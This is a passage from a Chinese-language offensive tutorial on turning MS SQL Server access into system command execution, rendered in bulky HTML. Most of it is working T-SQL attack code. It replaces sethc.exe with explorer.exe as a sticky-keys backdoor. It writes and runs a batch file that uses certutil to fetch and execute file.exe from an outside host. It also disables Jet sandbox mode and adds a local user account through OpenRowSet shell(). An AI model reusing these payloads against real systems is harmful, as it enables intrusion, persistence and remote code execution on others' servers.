    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oacreate </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'scripting.filesystemobject'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@o</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">out</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@o</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'copyfile'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">null</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\windows\explorer.exe'</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\windows\system32\sethc.exe'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@o</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oacreate </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'scripting.filesystemobject'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@o</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">out</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@o</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'copyfile'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">null</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\windows\system32\sethc.exe'</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\windows\system32\dllcache\sethc.exe'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
   </ol>

大家可以灵活运用,这里也可以这样玩,把他写成vbs或者其他的来下载文件 ,为什么不直接调用cmd来下载,再2008系统上我是不成功的,但是sp_oacreate可以启动这个文件,所以换个思路

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@sp_passwordxieo</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@t</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oacreate </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'scripting.filesystemobject'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@sp_passwordxieo</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">out</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@sp_passwordxieo</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'createtextfile'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">out</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\www\1.bat'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'@echo off'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'start cmd /k "cd c:\www & certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe"'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@shell</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oacreate </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'wscript.shell'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@shell</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> output </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@shell</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'run'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">null</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\www\1.bat'</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@shell</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oacreate </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'wscript.shell'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@shell</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> output </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@shell</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'run'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">null</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\www\file.exe'</span></code></span></span></p></li>
   </ol>

当然这里只是一种思路,你完全可以用vbs来下载什么的

0x02 沙盒

由于环境问题我这里就不演示了

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">..</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_regwrite </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'HKEY_LOCAL_MACHINE'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SOFTWARE\Microsoft\Jet\4.0\Engines'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SandBoxMode'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'REG_DWORD'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">dbo</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_regread </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'HKEY_LOCAL_MACHINE'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SOFTWARE\Microsoft\Jet\4.0\Engines'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SandBoxMode'</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">3.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="typ" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">Select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="typ" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">From</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="typ" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">OpenRowSet</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Microsoft.Jet.OLEDB.4.0'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">';Databasec:\windows\system32\ias\ias.mdb'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'select shell( net user itpro gmasfm /add )'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);</span></code></span></span></p></li>
   </ol>

引用前辈们的话

